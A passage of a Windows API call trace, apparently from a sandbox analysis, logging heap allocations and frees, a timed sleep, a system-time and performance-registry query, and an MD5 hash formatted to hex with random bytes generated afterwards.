hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.897] GetProcessHeap () returned 0xe30000 [0130.898] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.898] GetProcessHeap () returned 0xe30000 [0130.898] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.904] GetProcessHeap () returned 0xe30000 [0130.904] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.905] GetProcessHeap () returned 0xe30000 [0130.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.906] GetProcessHeap () returned 0xe30000 [0130.906] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.956] GetProcessHeap () returned 0xe30000 [0130.956] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.957] GetProcessHeap () returned 0xe30000 [0130.957] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.958] GetProcessHeap () returned 0xe30000 [0130.958] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0130.958] GetProcessHeap () returned 0xe30000 [0130.958] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0130.958] GetProcessHeap () returned 0xe30000 [0130.958] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2bbc8 | out: hHeap=0xe30000) returned 1 [0130.958] GetProcessHeap () returned 0xe30000 [0130.958] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0130.958] Sleep (dwMilliseconds=0xea60) [0140.973] GetTickCount () returned 0x11c5e85 [0140.974] GetProcessHeap () returned 0xe30000 [0140.974] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0140.974] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0140.977] GetProcessHeap () returned 0xe30000 [0140.977] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0140.977] GetTickCount () returned 0x11c5e85 [0140.977] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0140.977] GetCurrentProcess () returned 0xffffffff [0140.977] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0140.977] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed4f70) returned 1 [0140.977] CryptCreateHash (in: hProv=0xed4f70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0140.977] CryptHashData (hHash=0xec26b0, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0140.977] CryptGetHashParam (in: hHash=0xec26b0, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0140.977] CryptGetHashParam (in: hHash=0xec26b0, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0140.978] CryptDestroyHash (hHash=0xec26b0) returned 1 [0140.978] CryptReleaseContext (hProv=0xed4f70, dwFlags=0x0) returned 1 [0140.978] GetProcessHeap () returned 0xe30000 [0140.978] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0140.978] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="0b") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="4e") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="d9") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="6a") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="8d") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="e3") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="57") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="dd") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="b5") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="a0") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="00") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="df") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="99") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="3f") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="1d") returned 2 [0140.978] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="8e") returned 2 [0140.978] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed5080) returned 1 [0140.979] CryptGenRandom (in: hProv=0xed5080, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0140.979] CryptReleaseContext (hProv=0xed5080, dwFlags=0x0) returned 1 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2bbc8 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825d58 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b940 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811868 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b940 | out: hHeap=0xe30000) returned 1 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6812060 [0140.979] GetProcessHeap () returned 0xe30000 [0140.979] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825de8 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x681a5c8 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b430 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6818f38 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f980 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811b10 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b430 | out: hHeap=0xe30000) returned 1 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6874278 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811b10 | out: hHeap=0xe30000) returned 1 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fe40 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.980] GetProcessHeap () returned 0xe30000 [0140.980] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6811070 [0140.980] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fe40 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xe9be68 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811070 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.981] GetProcessHeap () returned 0xe30000 [0140.981] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.981] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0140.982] GetProcessHeap () returned 0xe30000 [0140.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.983] GetProcessHeap () returned 0xe30000 [0140.983] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap 